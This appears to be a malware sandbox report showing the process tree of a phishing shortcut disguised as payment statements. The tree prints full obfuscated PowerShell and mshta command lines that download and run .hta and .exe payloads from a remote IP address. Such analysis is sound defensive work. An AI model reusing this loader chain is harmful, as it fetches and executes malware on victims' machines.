popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "RZcvibqEQ" C:\Users\test22\AppData\Local\Temp\Updated_Payments_Statements.link.lnk

    2192

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $dR=@(42117,42123,42112,42124,42105,42040,42112,42124,42124,42120,42066,42055,42055,42057,42063,42065,42054,42060,42059,42054,42057,42064,42063,42054,42057,42064,42059,42055,42112,42112,42110,42117,42055,42113,42118,42126,42119,42113,42107,42109,42054,42112,42124,42105);$H=@(42081,42077,42096);function J($UD){$dR=42008;$Pf=$Null;foreach($pb in $UD){$Pf+=[char]($pb-$dR)};return $Pf};sal QbxXCDZHn (J $H);QbxXCDZHn((J $dR));

      2272

      • mshta.exe "C:\Windows\system32\mshta.exe" http://179.43.187.183/hhfm/invoice.hta

        2436

        • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function SX($R, $Up){[IO.File]::WriteAllBytes($R, $Up)};function cx($R){if($R.EndsWith((y @(13161,13215,13223,13223))) -eq $True){Start-Process (y @(13229,13232,13225,13215,13223,13223,13166,13165,13161,13216,13235,13216)) $R}else{Start-Process $R}};function W($d){$xv = New-Object (y @(13193,13216,13231,13161,13202,13216,13213,13182,13223,13220,13216,13225,13231));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Up = $xv.DownloadData($d);return $Up};function y($c){$U=13115;$a=$Null;foreach($z in $c){$a+=[char]($z-$U)};return $a};function Tf(){$SL = $env:APPDATA + '\';$b = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13220,13225,13233,13226,13220,13214,13216,13161,13216,13235,13216));$TK = $SL + 'invoice.exe';SX $TK $b;cx $TK;;$Qw = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13227,13212,13236,13224,13216,13225,13231,13161,13216,13235,13216,13124));$Q = $SL + 'payment.exe ';SX $Q $Qw;cx $Q;;;}Tf;

          1088

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf